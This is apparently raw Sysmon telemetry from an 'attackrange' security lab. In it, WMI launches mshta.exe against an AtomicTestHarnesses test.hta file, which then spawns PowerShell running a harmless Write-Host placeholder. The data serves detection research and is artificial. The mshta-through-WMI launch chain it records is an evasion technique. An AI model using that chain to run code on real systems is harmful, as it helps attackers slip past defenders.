15:59:25.147{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-535D-6008-4E06-00000000A301}3308C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024592Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.116{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-535D-6008-4F06-00000000A301}7788C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024591Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.116{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-535D-6008-4F06-00000000A301}7788C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024590Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.101{7901BC46-535D-6008-4F06-00000000A301}77886980C:\Windows\system32\conhost.exe{7901BC46-535D-6008-4E06-00000000A301}3308C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024589Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.101{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-535D-6008-4F06-00000000A301}7788C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000024588Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.101{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024587Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.101{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024586Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.101{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024585Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.101{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024584Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.101{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-535D-6008-4E06-00000000A301}3308C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000024583Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.101{7901BC46-535D-6008-4D06-00000000A301}71887800C:\Windows\System32\mshta.exe{7901BC46-535D-6008-4E06-00000000A301}3308C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\shell32.dll+8d42f|C:\Windows\System32\shell32.dll+8d2bc|C:\Windows\System32\shell32.dll+6b47e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000024582Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.102{7901BC46-535D-6008-4E06-00000000A301}3308C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa; Start-Sleep -Seconds 2; exitC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{7901BC46-535D-6008-4D06-00000000A301}7188C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "\\WIN-DC-283\C$\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\test.hta" 10341000x800000000000000024581Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.069{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-535D-6008-4D06-00000000A301}7188C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024580Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.069{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-535D-6008-4D06-00000000A301}7188C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024579Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.069{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-535D-6008-4D06-00000000A301}7188C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024578Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.054{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-535D-6008-4D06-00000000A301}7188C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024577Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.054{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-535D-6008-4D06-00000000A301}7188C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024576Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.038{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-535D-6008-4D06-00000000A301}7188C:\Windows\System32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024575Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.038{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-535D-6008-4D06-00000000A301}7188C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024574Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.022{7901BC46-4A88-6008-F200-00000000A301}19126716C:\Windows\system32\csrss.exe{7901BC46-535D-6008-4D06-00000000A301}7188C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000024573Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.022{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024572Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.022{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024571Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.022{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024570Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.022{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024569Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.022{7901BC46-4984-6008-0500-00000000A301}640756C:\Windows\system32\csrss.exe{7901BC46-535D-6008-4D06-00000000A301}7188C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000024568Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.022{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535D-6008-4D06-00000000A301}7188C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4 154100x800000000000000024567Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.033{7901BC46-535D-6008-4D06-00000000A301}7188C:\Windows\System32\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXE"C:\Windows\System32\mshta.exe" "\\WIN-DC-283\C$\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\test.hta"C:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{7901BC46-5350-6008-1E06-00000000A301}6628C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x800000000000000024566Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535B-6008-4C06-00000000A301}5212C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024565Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535B-6008-4B06-00000000A301}6040C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024564Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 